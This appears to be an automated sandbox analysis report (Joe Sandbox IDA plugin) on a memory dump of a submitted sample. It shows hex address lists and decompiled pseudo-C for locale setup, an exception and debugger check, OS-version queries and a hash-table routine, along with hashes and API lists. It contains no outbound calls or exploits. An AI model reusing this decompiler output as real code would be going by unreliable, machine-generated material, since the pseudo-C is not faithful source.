0x0007644d
0x00076450
0x00076457
0x0007645a
0x0007645d
0x0007645f
0x00076462
0x00076469
0x0007646e
0x0007646e
0x00000000
0x0007646e
0x00076429
0x0007642d
0x00076488
0x00076488
0x0007648b
0x00076700
0x00076703
0x00076705
0x0007670b
0x00076712
0x00076715
0x00076717
0x00000000
0x00076717
0x00076491
0x00076497
0x0007649c
0x000764a3
0x000764a8
0x000764aa
0x000764ac
0x000764b6
0x000764c4
0x000764ce
0x000764d0
0x000764d4
0x000764d7
0x000764db
0x000764de
0x000764e2
0x000764e6
0x000764ec
0x000764f1
0x000764fa
0x00076500
0x00076502
0x00076504
0x0007650e
0x00076514
0x00076520
0x00076522
0x00076526
0x00076529
0x0007652d
0x00076531
0x0007653f
0x00076544
0x00076549
0x0007654e
0x00076553
0x00076565
0x0007656d
0x0007656f
0x00076575
0x00076578
0x0007657c
0x00076580
0x00076582
0x00076587
0x00076599
0x0007659c
0x0007659e
0x000765a1
0x000765b2
0x000765b4
0x000765be
0x000765c1
0x000765c4
0x000765c8
0x000765cc
0x000765d0
0x000765d0
0x000765d2
0x000765d6
0x000765d6
0x000765a1
0x000765de
0x000765e2
0x000765e8
0x000765ec
0x000765f0
0x000765f4
0x000765f8
0x000765fb
0x000765fd
0x00076603
0x00076607
0x0007660b
0x0007660f
0x00076613
0x0007661f
0x0007664d
0x00076653
0x00076668
0x0007666f
0x00076672
0x00076676
0x0007667b
0x0007667d
0x0007667f
0x00076688
0x0007668b
0x00076692
0x0007669a
0x0007669c
0x0007669f
0x000766a1
0x000766a4
0x000766a9
0x000766ab
0x00076727
0x0007672c
0x00000000
0x000766ad
0x000766ad
0x000766b5
0x000766b8
0x00076730
0x00076734
0x00076738
0x0007673c
0x0007674c
0x00076754
0x00076756
0x00076759
0x0007675f
0x00076761
0x00076766
0x0007678c
0x0007678e
0x00076768
0x00076768
0x0007676c
0x0007676e
0x00076770
0x00076775
0x00076777
0x00076779
0x0007677d
0x00076784
0x00076786
0x00076788
0x00076788
0x00076779
0x00076790
0x00076790
0x00076793
0x00076795
0x00076798
0x0007679b
0x0007679f
0x000767a3
0x000767a8
0x000767e5
0x000767e7
0x000767ee
0x000767f0
0x000767aa
0x000767ae
0x000767b6
0x000767b8
0x000767ba
0x000767bf
0x000767c5
0x000767c7
0x000767c9
0x000767d6
0x000767d9
0x000767db
0x000767db
0x000767bf
0x00000000
0x000767a8
0x000766d4
0x000766dd
0x000766eb
0x000766ee
0x000766f0
0x000766f8
0x00000000
0x000766f8
0x000766ab
0x0007642f
0x00076431
0x00000000
0x00000000
0x00000000
0x0007628c
0x00076295
0x000762a1
0x000762a3
0x000762a5
0x000762a8
0x000763ba
0x000763ba
0x000763bc
0x000763be
0x000763be
0x000763c0
0x000763c3
0x000763c6
0x00076471
0x00076477
0x00076487
0x00076487
0x00076286
0x00076266

APIs

__aulldiv.LIBCMT ref: 00076727
__aullrem.LIBCMT ref: 00076812
__aulldiv.LIBCMT ref: 00076843

Memory Dump Source

Source File: 00000010.00000002.503627691.0000000000061000.00000020.00000001.01000000.00000004.sdmp, Offset: 00060000, based on PE: true

Associated: 00000010.00000002.503616294.0000000000060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504300546.0000000000106000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504435698.0000000000120000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504454499.0000000000121000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504486763.0000000000122000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504552019.0000000000131000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504572122.000000000013A000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504579268.000000000013B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_60000_fQQPwD.jbxd

Similarity

API ID: __aulldiv$__aullrem
String ID:
API String ID: 2022606265-0
Opcode ID: a050fa02737ab4901c3f7b49d1fc0ec0dda509d4c3f76cecf36da8dacb8d63c3
Instruction ID: c3068c53f06ad6f81d168e6d34d94f9f1ac0af8843725e6d59118df20ee42986
Opcode Fuzzy Hash: a050fa02737ab4901c3f7b49d1fc0ec0dda509d4c3f76cecf36da8dacb8d63c3
Instruction Fuzzy Hash: 89126072B087119FC718CE2DC89062AF7E6ABC8750F19CA2DE99DD73A0D675DC058B81

Uniqueness

Uniqueness Score: -1.00%

Function 000FA23D Relevance: 7.7, APIs: 5, Instructions: 183
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E000FA23D(void* __ecx, void* __edx, signed short _a4, signed short* _a8, short* _a12) {
				signed int _v8;
				int _v12;
				int _v16;
				char _v20;
				signed short* _v24;
				signed short* _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t39;
				void* _t45;
				signed short* _t46;
				signed short _t47;
				signed short _t48;
				int _t49;
				void* _t53;
				signed short* _t57;
				signed short _t70;
				intOrPtr _t73;
				void* _t75;
				signed short _t76;
				intOrPtr _t83;
				short* _t86;
				signed short _t89;
				signed short* _t99;
				void* _t100;
				signed short _t101;
				signed int _t104;
				void* _t105;

				_t39 =  *0x120014; // 0xf049169a
				_v8 = _t39 ^ _t104;
				_t86 = _a12;
				_t101 = _a4;
				_v28 = _a8;
				_v24 = E000F55BA(__ecx, __edx, _t101) + 0x50;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t45 = E000F55BA(__ecx, __edx, _t101);
				_t97 = 0;
				 *((intOrPtr*)(_t45 + 0x34c)) =  &_v20;
				_t89 = _t101 + 0x80;
				_t46 = _v24;
				 *_t46 = _t101;
				_t99 =  &(_t46[2]);
				 *_t99 = _t89;
				if(_t89 != 0 &&  *_t89 != 0) {
					_t83 =  *0x10a00c; // 0x17
					E000FA432(_t89, 0, 0x109ef8, _t83 - 1, _t99);
					_t46 = _v24;
					_t105 = _t105 + 0xc;
					_t97 = 0;
				}
				_v20 = _t97;
				_t47 =  *_t46;
				if(_t47 == 0 ||  *_t47 == _t97) {
					_t48 =  *_t99;
					if(_t48 == 0 ||  *_t48 == _t97) {
						_v20 = 0x104;
						_t49 = GetUserDefaultLCID();
						_v12 = _t49;
						_v16 = _t49;
					} else {
						L000FA8C5(_t89, _t97,  &_v20);
						_pop(_t89);
					}
					goto L20;
				} else {
					_t70 =  *_t99;
					if(_t70 == 0 ||  *_t70 == _t97) {
						E000FA783(_t89, _t97,  &_v20);
					} else {
						E000FA493(_t89, _t97,  &_v20);
					}
					_pop(_t89);
					if(_v20 != 0) {
						_t100 = 0;
						goto L25;
					} else {
						_t73 =  *0x109ef4; // 0x41
						_t75 = E000FA432(_t89, _t97, 0x109be8, _t73 - 1, _v24);
						_t105 = _t105 + 0xc;
						if(_t75 == 0) {
							L20:
							_t100 = 0;
							L21:
							if(_v20 != 0) {
								L25:
								asm("sbb esi, esi");
								_t101 = L000FA9B7(_t89,  ~_t101 & _t101 + 0x00000100,  &_v20);
								if(_t101 == 0 || IsValidCodePage(_t101 & 0x0000ffff) == 0 || IsValidLocale(_v16, 1) == 0) {
									goto L22;
								} else {
									_t57 = _v28;
									if(_t57 != 0) {
										 *_t57 = _t101;
									}
									E000F607C(_v16,  &(_v24[0x128]), 0x55, _t100);
									if(_t86 == 0) {
										L34:
										_t53 = 1;
										L23:
										return E000DE643(_t53, _t86, _v8 ^ _t104, _t97, _t100, _t101);
									} else {
										_t33 =  &(_t86[0x90]); // 0xd0
										E000F607C(_v16, _t33, 0x55, _t100);
										if(GetLocaleInfoW(_v16, 0x1001, _t86, 0x40) == 0) {
											goto L22;
										}
										_t36 =  &(_t86[0x40]); // 0x30
										if(GetLocaleInfoW(_v12, 0x1002, _t36, 0x40) == 0) {
											goto L22;
										}
										_t38 =  &(_t86[0x80]); // 0xb0
										E001026B9(_t38, _t101, _t38, 0x10, 0xa);
										goto L34;
									}
								}
							}
							L22:
							_t53 = 0;
							goto L23;
						}
						_t76 =  *_t99;
						_t100 = 0;
						if(_t76 == 0 ||  *_t76 == 0) {
							E000FA783(_t89, _t97,  &_v20);
						} else {
							E000FA493(_t89, _t97,  &_v20);
						}
						_pop(_t89);
						goto L21;
					}
				}
			}

0x000fa245
0x000fa24c
0x000fa253
0x000fa257
0x000fa25b
0x000fa269
0x000fa26e
0x000fa26f
0x000fa270
0x000fa271
0x000fa279
0x000fa27b
0x000fa281
0x000fa287
0x000fa28a
0x000fa28c
0x000fa28f
0x000fa293
0x000fa29a
0x000fa2a7
0x000fa2ac
0x000fa2af
0x000fa2b2
0x000fa2b2
0x000fa2b4
0x000fa2b7
0x000fa2bb
0x000fa32b
0x000fa32f
0x000fa342
0x000fa349
0x000fa34f
0x000fa352
0x000fa336
0x000fa33a
0x000fa33f
0x000fa33f
0x00000000
0x000fa2c2
0x000fa2c2
0x000fa2c6
0x000fa2dc
0x000fa2cd
0x000fa2d1
0x000fa2d1
0x000fa2e5
0x000fa2e6
0x000fa36e
0x00000000
0x000fa2ec
0x000fa2ec
0x000fa2fb
0x000fa300
0x000fa305
0x000fa355
0x000fa355
0x000fa357
0x000fa35b
0x000fa370
0x000fa37c
0x000fa386
0x000fa38c
0x00000000
0x000fa3ab
0x000fa3ab
0x000fa3b0
0x000fa3b2
0x000fa3b2
0x000fa3c3
0x000fa3ca
0x000fa42a
0x000fa42c
0x000fa35f
0x000fa36d
0x000fa3cc
0x000fa3cf
0x000fa3d9
0x000fa3f1
0x00000000
0x00000000
0x000fa3f9
0x000fa410
0x00000000
0x00000000
0x000fa41a
0x000fa422
0x00000000
0x000fa427
0x000fa3ca
0x000fa38c
0x000fa35d
0x000fa35d
0x00000000
0x000fa35d
0x000fa307
0x000fa309
0x000fa30d
0x000fa323
0x000fa314
0x000fa318
0x000fa318
0x000fa328
0x00000000
0x000fa328
0x000fa2e6

APIs

Part of subcall function 000F55BA: GetLastError.KERNEL32(?,00000008,000F2B3A), ref: 000F55BE
Part of subcall function 000F55BA: SetLastError.KERNEL32(00000000,?), ref: 000F5660

GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 000FA349
IsValidCodePage.KERNEL32(00000000), ref: 000FA392
IsValidLocale.KERNEL32(?,00000001), ref: 000FA3A1
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 000FA3E9
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 000FA408

Memory Dump Source

Source File: 00000010.00000002.503627691.0000000000061000.00000020.00000001.01000000.00000004.sdmp, Offset: 00060000, based on PE: true

Associated: 00000010.00000002.503616294.0000000000060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504300546.0000000000106000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504435698.0000000000120000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504454499.0000000000121000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504486763.0000000000122000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504552019.0000000000131000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504572122.000000000013A000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504579268.000000000013B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_60000_fQQPwD.jbxd

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
String ID:
API String ID: 415426439-0
Opcode ID: 345c0668134f9ab96849ce66efda74b782d72cca192abe69ff98c75736f18807
Instruction ID: f5f7364469087035eb62fd17fb71258e58b8f0532f333ab7b0d25185fff33c5c
Opcode Fuzzy Hash: 345c0668134f9ab96849ce66efda74b782d72cca192abe69ff98c75736f18807
Instruction Fuzzy Hash: 0B5164B1B0020DAFDB50DFA4CC45AFE77F8BF46740F184425B619E7591D7709A40AB62

Uniqueness

Uniqueness Score: -1.00%

Function 000DE294 Relevance: 6.1, APIs: 4, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E000DE294(intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4) {
				char _v0;
				struct _EXCEPTION_POINTERS _v12;
				intOrPtr _v80;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v608;
				intOrPtr _v612;
				void* _v616;
				intOrPtr _v620;
				char _v624;
				intOrPtr _v628;
				intOrPtr _v632;
				intOrPtr _v636;
				intOrPtr _v640;
				intOrPtr _v644;
				intOrPtr _v648;
				intOrPtr _v652;
				intOrPtr _v656;
				intOrPtr _v660;
				intOrPtr _v664;
				intOrPtr _v668;
				char _v808;
				char* _t39;
				long _t49;
				intOrPtr _t51;
				void* _t54;
				intOrPtr _t55;
				intOrPtr _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr* _t60;

				_t59 = __esi;
				_t58 = __edi;
				_t57 = __edx;
				if(IsProcessorFeaturePresent(0x17) != 0) {
					_t55 = _a4;
					asm("int 0x29");
				}
				E000DE202(_t34);
				 *_t60 = 0x2cc;
				_v632 = E000E11A0(_t58,  &_v808, 0, 3);
				_v636 = _t55;
				_v640 = _t57;
				_v644 = _t51;
				_v648 = _t59;
				_v652 = _t58;
				_v608 = ss;
				_v620 = cs;
				_v656 = ds;
				_v660 = es;
				_v664 = fs;
				_v668 = gs;
				asm("pushfd");
				_pop( *_t15);
				_v624 = _v0;
				_t39 =  &_v0;
				_v612 = _t39;
				_v808 = 0x10001;
				_v628 =  *((intOrPtr*)(_t39 - 4));
				E000E11A0(_t58,  &_v92, 0, 0x50);
				_v92 = 0x40000015;
				_v88 = 1;
				_v80 = _v0;
				_t28 = IsDebuggerPresent() - 1; // -1
				_v12.ExceptionRecord =  &_v92;
				asm("sbb bl, bl");
				_v12.ContextRecord =  &_v808;
				_t54 =  ~_t28 + 1;
				SetUnhandledExceptionFilter(0);
				_t49 = UnhandledExceptionFilter( &_v12);
				if(_t49 == 0 && _t54 == 0) {
					_push(3);
					return E000DE202(_t49);
				}
				return _t49;
			}

0x000de294
0x000de294
0x000de294
0x000de2a8
0x000de2aa
0x000de2ad
0x000de2ad
0x000de2b1
0x000de2b6
0x000de2ce
0x000de2d4
0x000de2da
0x000de2e0
0x000de2e6
0x000de2ec
0x000de2f2
0x000de2f9
0x000de300
0x000de307
0x000de30e
0x000de315
0x000de31c
0x000de31d
0x000de326
0x000de32c
0x000de32f
0x000de335
0x000de344
0x000de350
0x000de35b
0x000de362
0x000de369
0x000de374
0x000de37c
0x000de385
0x000de387
0x000de38a
0x000de38c
0x000de396
0x000de39e
0x000de3a4
0x00000000
0x000de3ab
0x000de3ae

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 000DE2A0
IsDebuggerPresent.KERNEL32 ref: 000DE36C
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 000DE38C
UnhandledExceptionFilter.KERNEL32(?), ref: 000DE396

Memory Dump Source

Source File: 00000010.00000002.503627691.0000000000061000.00000020.00000001.01000000.00000004.sdmp, Offset: 00060000, based on PE: true

Associated: 00000010.00000002.503616294.0000000000060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504300546.0000000000106000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504435698.0000000000120000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504454499.0000000000121000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504486763.0000000000122000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504552019.0000000000131000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504572122.000000000013A000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504579268.000000000013B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_60000_fQQPwD.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 4c1ec0b8e98b05e4d8449731681facca9230025dc86c4660a4a6e46ceb11f415
Instruction ID: 9da8acf755f7c2526a5bbc10eba797c16430d7601ee7ccea55030444f4750ef3
Opcode Fuzzy Hash: 4c1ec0b8e98b05e4d8449731681facca9230025dc86c4660a4a6e46ceb11f415
Instruction Fuzzy Hash: D13127B5D0531C9BDB10EFA4D989BCDBBF8AF08300F1040EAE40DAB251EB749A848F54

Uniqueness

Uniqueness Score: -1.00%

Function 000A2070 Relevance: 6.1, APIs: 4, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 41%

			E000A2070(void* __fp0) {
				signed int _v20;
				struct _OSVERSIONINFOW _v304;
				char _v308;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t14;
				intOrPtr _t21;
				intOrPtr _t27;
				signed int _t28;
				void* _t34;
				signed char* _t36;
				signed int _t37;
				void* _t45;

				_t45 = __fp0;
				_t14 =  *0x120014; // 0xf049169a
				_v20 = _t14 ^ _t37;
				E000E11A0(_t34,  &(_v304.dwMajorVersion), 0, 0x118);
				_v304.dwOSVersionInfoSize = 0x11c;
				_t35 =  &_v304;
				GetVersionExW( &_v304);
				_v308 = 0;
				__imp__GetProductInfo(_v304.dwMajorVersion, _v304.dwMinorVersion, 0, 0,  &_v308);
				_push(0x5c);
				_t36 = L000DDBBC();
				_t27 = _v308;
				_t21 =  *0x126a5c; // 0x0
				_t28 =  *0x123e38; // 0x0
				_t33 =  *[fs:0x2c];
				if(_t21 >  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c] + _t28 * 4)) + 4))) {
					L000DDC67(_t21, 0x126a5c);
					if( *0x126a5c == 0xffffffff) {
						asm("xorps xmm0, xmm0");
						asm("movups [0x126a48], xmm0");
						asm("movups [0x126a38], xmm0");
						 *0x126a58 = 0;
						__imp__GetNativeSystemInfo(0x126a38);
						L000DDCDD(0x126a5c);
					}
				}
				E000DE643(E000A2290(_t36, _t45, _t35, 0x126a38), _t27, _v20 ^ _t37, _t33, _t35, _t36, _t27);
				return _t36;
			}

0x000a2070
0x000a207c
0x000a2083
0x000a2094
0x000a209c
0x000a20a6
0x000a20ad
0x000a20b3
0x000a20d4
0x000a20da
0x000a20e4
0x000a20e6
0x000a20ec
0x000a20f1
0x000a20f7
0x000a2107
0x000a2133
0x000a2142
0x000a2144
0x000a2147
0x000a214e
0x000a2155
0x000a2164
0x000a216f
0x000a2174
0x000a2142
0x000a211c
0x000a212d

APIs

GetVersionExW.KERNEL32(0000011C), ref: 000A20AD
GetProductInfo.KERNEL32(?,?,00000000,00000000,00000000), ref: 000A20D4
__Init_thread_header.LIBCMT ref: 000A2133
GetNativeSystemInfo.KERNEL32(00126A38), ref: 000A2164

Memory Dump Source

Source File: 00000010.00000002.503627691.0000000000061000.00000020.00000001.01000000.00000004.sdmp, Offset: 00060000, based on PE: true

Associated: 00000010.00000002.503616294.0000000000060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504300546.0000000000106000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504435698.0000000000120000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504454499.0000000000121000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504486763.0000000000122000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504552019.0000000000131000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504572122.000000000013A000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504579268.000000000013B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_60000_fQQPwD.jbxd

Similarity

API ID: Info$Init_thread_headerNativeProductSystemVersion
String ID:
API String ID: 2164803554-0
Opcode ID: d50877dada6e993bec94910dc121794097157d9beb5d14fcda97eec3d2eeeb60
Instruction ID: 6277399a4caae4d202b874b7b439e111fa57929b3eaae763e27b1663f14ae09e
Opcode Fuzzy Hash: d50877dada6e993bec94910dc121794097157d9beb5d14fcda97eec3d2eeeb60
Instruction Fuzzy Hash: 39212531E00218ABE720DB54FC86BE973B4EB49710F00416AF605676C1E7B06AE4CB91

Uniqueness

Uniqueness Score: -1.00%

Function 000B00C0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 274
COMMONCrypto

Download Yara Rule

C-Code - Quality: 18%

			E000B00C0(signed int __ecx, intOrPtr __fp0, signed int** _a4, intOrPtr* _a8, signed int** _a16) {
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				void* __ebx;
				void* __edi;
				signed int _t97;
				signed int _t98;
				signed int _t99;
				signed int _t100;
				signed int _t105;
				signed int _t108;
				signed int* _t109;
				signed int _t111;
				signed int _t114;
				signed int _t116;
				unsigned int _t125;
				signed int _t129;
				signed int* _t133;
				signed int** _t134;
				signed int _t135;
				signed int _t136;
				signed int _t138;
				signed int _t139;
				signed int _t140;
				signed int _t147;
				signed int _t150;
				signed int _t153;
				signed int _t154;
				void* _t157;
				signed int _t158;
				signed int _t182;
				unsigned int _t187;
				unsigned int _t189;
				signed int _t190;
				signed int _t191;
				signed int _t192;
				signed int** _t193;
				signed int _t194;
				signed int* _t196;
				intOrPtr _t207;

				_t207 = __fp0;
				_t135 = __ecx;
				_v20 =  *_a8;
				_t187 =  *(__ecx + 4);
				_v24 = __ecx;
				if(_t187 == 0) {
					_t190 = 0xffffffff;
					L17:
					 *_t196 = 0x1c;
					_t133 = L000DDBBC();
					_t133[2] =  *( *_a16);
					asm("xorps xmm0, xmm0");
					asm("movups [ebx+0xc], xmm0");
					_t133[1] = _v20;
					 *_t133 = 0;
					_t136 = _v24;
					asm("movq xmm2, [0x110dd0]");
					asm("movd xmm0, eax");
					asm("por xmm0, xmm2");
					asm("subsd xmm0, xmm2");
					asm("cvtsd2ss xmm0, xmm0");
					asm("movss xmm1, [ecx+0x10]");
					__eflags = _t187;
					if(__eflags == 0) {
						L19:
						asm("divss xmm0, xmm1");
						asm("cvtss2sd xmm0, xmm0");
						asm("movsd [esp], xmm0");
						_t97 = E001036A0(_t136);
						_v40 = _t207;
						asm("movss xmm0, [ebp-0x24]");
						asm("cvttss2si eax, xmm0");
						asm("subss xmm0, [0x110dd8]");
						asm("cvttss2si ecx, xmm0");
						_t138 = _t136 & _t97 >> 0x0000001f | _t97;
						_t153 = _t187 + _t187;
						_t98 = 1;
						__eflags = _t187 - 3;
						if(_t187 >= 3) {
							_t39 = _t187 - 1; // -1
							_t194 = _t39;
							__eflags = _t187 & _t194;
							_t43 = (_t187 & _t194) != 0;
							__eflags = _t43;
							_t98 = 0 | _t43;
						}
						_t99 = _t98 | _t153;
						__eflags = _t99 - _t138;
						_t100 =  <=  ? _t138 : _t99;
						_t191 = 2;
						__eflags = _t100 - 1;
						if(_t100 != 1) {
							_t45 = _t100 - 1; // 0x0
							_t139 = _t45;
							__eflags = _t100 & _t139;
							if((_t100 & _t139) != 0) {
								 *_t196 = _t100;
								_t191 = E0007A3AC(_t133, _t187);
								_t140 = _v24;
								_t187 =  *(_t140 + 4);
							} else {
								_t191 = _t100;
								_t140 = _v24;
							}
						} else {
							_t140 = _v24;
						}
						_t154 = _v20;
						__eflags = _t191 - _t187;
						if(__eflags > 0) {
							L35:
							 *_t196 = _t191;
							L0009DCB0(_t140, _t207);
							_t154 = _v20;
							_t140 = _v24;
							goto L36;
						} else {
							if(__eflags >= 0) {
								L36:
								_t187 =  *(_t140 + 4);
								_t59 = _t187 - 1; // -1
								_t192 = _t59;
								__eflags = _t187 & _t192;
								if((_t187 & _t192) != 0) {
									__eflags = _t154 - _t187;
									if(_t154 >= _t187) {
										_t63 = _t154 % _t187;
										__eflags = _t63;
										_t190 = _t63;
										_t140 = _v24;
									} else {
										_t190 = _t154;
									}
								} else {
									_t190 = _t192 & _t154;
								}
								L41:
								_t157 =  *_t140;
								_t105 =  *(_t157 + _t190 * 4);
								__eflags = _t105;
								if(_t105 == 0) {
									 *_t133 =  *(_t140 + 8);
									 *(_t140 + 8) = _t133;
									 *(_t157 + _t190 * 4) = _t140 + 8;
									_t108 =  *_t133;
									__eflags = _t108;
									_t193 = _a4;
									if(_t108 == 0) {
										L50:
										_t85 = _t140 + 0xc;
										 *_t85 =  *(_t140 + 0xc) + 1;
										__eflags =  *_t85;
										_t109 = 1;
										goto L51;
									}
									_t111 =  *(_t108 + 4);
									_t77 = _t187 - 1; // -1
									_t158 = _t77;
									__eflags = _t187 & _t158;
									if((_t187 & _t158) != 0) {
										__eflags = _t111 - _t187;
										if(_t111 >= _t187) {
											_t81 = _t111 % _t187;
											__eflags = _t81;
											_t111 = _t81;
											_t140 = _v24;
										}
									} else {
										_t111 = _t111 & _t158;
									}
									_t105 = (_t111 << 2) +  *_t140;
									__eflags = _t105;
									L49:
									 *_t105 = _t133;
									goto L50;
								}
								 *_t133 =  *_t105;
								_t193 = _a4;
								goto L49;
							}
							asm("movss xmm0, [ecx+0xc]");
							asm("orpd xmm0, [0x110de0]");
							asm("subsd xmm0, [0x110dd0]");
							asm("cvtsd2ss xmm0, xmm0");
							asm("divss xmm0, [ecx+0x10]");
							asm("cvtss2sd xmm0, xmm0");
							asm("movsd [esp], xmm0");
							_t114 = E001036A0(_t140);
							_v36 = _t207;
							asm("movss xmm0, [ebp-0x20]");
							asm("cvttss2si ecx, xmm0");
							asm("subss xmm0, [0x110dd8]");
							asm("cvttss2si eax, xmm0");
							_t116 = _t114 & _t140 >> 0x0000001f | _t140;
							__eflags = _t187 - 3;
							if(_t187 < 3) {
								L33:
								 *_t196 = _t116;
								_t116 = E0007A3AC(_t133, _t187);
								L34:
								_t140 = _v24;
								_t154 = _v20;
								__eflags = _t191 - _t116;
								_t191 =  <=  ? _t116 : _t191;
								__eflags = _t191 - _t187;
								if(_t191 >= _t187) {
									goto L36;
								}
								goto L35;
							}
							_t147 = (((_t187 - (_t187 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t187 - (_t187 >> 0x00000001 & 0x55555555) & 0x33333333) >> 0x00000004) + (_t187 - (_t187 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t187 - (_t187 >> 0x00000001 & 0x55555555) & 0x33333333) & 0x0f0f0f0f) * 0x1010101 >> 0x18;
							__eflags = _t147 - 1;
							if(_t147 > 1) {
								goto L33;
							}
							__eflags = _t116 - 2;
							if(_t116 >= 2) {
								asm("bsr ecx, eax");
								_t116 = 1 <<  ~(_t147 ^ 0x0000001f);
							}
							goto L34;
						}
					}
					asm("movd xmm3, edi");
					asm("por xmm3, xmm2");
					asm("subsd xmm3, xmm2");
					asm("xorps xmm2, xmm2");
					asm("cvtsd2ss xmm2, xmm3");
					asm("mulss xmm2, xmm1");
					asm("ucomiss xmm0, xmm2");
					if(__eflags <= 0) {
						goto L41;
					}
					goto L19;
				} else {
					_t125 = _t187;
					_t189 = (((_t187 - (_t187 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t187 - (_t187 >> 0x00000001 & 0x55555555) & 0x33333333) >> 0x00000004) + (_t187 - (_t187 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t187 - (_t187 >> 0x00000001 & 0x55555555) & 0x33333333) & 0x0f0f0f0f) * 0x1010101 >> 0x18;
					_v28 = _t125;
					if(_t189 > 1) {
						_t182 = _v20;
						_t190 = _t182;
						__eflags = _t182 - _t125;
						if(_t182 >= _t125) {
							_t11 = _t182 % _v28;
							__eflags = _t11;
							_t190 = _t11;
							_t182 = _v20;
							_t135 = _v24;
						}
					} else {
						_t6 = _t125 - 1; // -1
						_t182 = _v20;
						_t190 = _t6 & _t182;
					}
					_t134 =  *( *_t135 + _t190 * 4);
					if(_t134 == 0) {
						L16:
						_t30 =  &_v28; // 0xae94b
						_t187 =  *_t30;
						goto L17;
					}
					_t19 =  &_v28; // 0xae94b
					_v32 =  *_t19 - 1;
					_t21 =  &_v28; // 0xae94b
					_t150 =  *_t21;
					while(1) {
						_t133 =  *_t134;
						if(_t133 == 0) {
							goto L16;
						}
						_t129 = _t133[1];
						if(_t129 == _t182) {
							L10:
							if(_t133[2] == _t182) {
								_t109 = 0;
								_t193 = _a4;
								L51:
								 *_t193 = _t133;
								_t193[1] = _t109;
								return _t193;
							}
							continue;
						}
						if(_t189 <= 1) {
							_t129 = _t129 & _v32;
							__eflags = _t129;
						} else {
							if(_t129 >= _t150) {
								_t129 = _t129 % _t150;
								_t182 = _v20;
							}
						}
						if(_t129 != _t190) {
							goto L16;
						} else {
							goto L10;
						}
					}
					goto L16;
				}
			}

0x000b00c0
0x000b00c0
0x000b00ce
0x000b00d1
0x000b00d6
0x000b00d9
0x000b0125
0x000b0194
0x000b0194
0x000b01a0
0x000b01a9
0x000b01ac
0x000b01af
0x000b01b6
0x000b01b9
0x000b01bf
0x000b01c6
0x000b01ce
0x000b01d2
0x000b01d6
0x000b01da
0x000b01de
0x000b01e3
0x000b01e5
0x000b0207
0x000b0207
0x000b020b
0x000b020f
0x000b0214
0x000b0219
0x000b021c
0x000b0221
0x000b0227
0x000b0232
0x000b0238
0x000b023a
0x000b023d
0x000b0242
0x000b0245
0x000b0247
0x000b0247
0x000b024c
0x000b024e
0x000b024e
0x000b024e
0x000b024e
0x000b0251
0x000b0253
